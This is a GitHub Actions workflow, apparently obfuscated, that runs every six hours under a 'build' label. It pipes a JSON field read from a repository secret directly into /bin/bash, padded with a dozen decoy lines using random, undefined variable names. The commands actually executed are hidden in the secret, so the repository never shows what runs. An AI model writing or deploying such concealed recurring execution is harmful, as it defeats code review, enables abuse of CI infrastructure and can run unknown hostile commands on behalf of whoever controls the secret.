name: charcoalterrorist
on:
  workflow_dispatch:
  schedule:
    - cron: '58 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: charcoalterrorist
        env:
          pyzd6584: ${{ secrets.pyzd6584 }}
        run: |
          echo $pyzd6584 | jq -r .ydfm9490 | /bin/bash
          echo $u80 | jq -r .hjuvc3204 | /bin/bash
          echo $z192 | jq -r .t0564 | /bin/bash
          echo $tlsl2973 | jq -r .g5 | /bin/bash
          echo $t9 | jq -r .bn09 | /bin/bash
          echo $cl40 | jq -r .yndd44 | /bin/bash
          echo $ibj5125 | jq -r .avhq94 | /bin/bash
          echo $nps482 | jq -r .suyuz6904 | /bin/bash
          echo $s858 | jq -r .pebag3 | /bin/bash
          echo $styo1 | jq -r .cewtf93 | /bin/bash
          echo $djzkp4 | jq -r .ine66275 | /bin/bash
          echo $gput491 | jq -r .c9800 | /bin/bash
          echo $a8 | jq -r .nd142 | /bin/bash

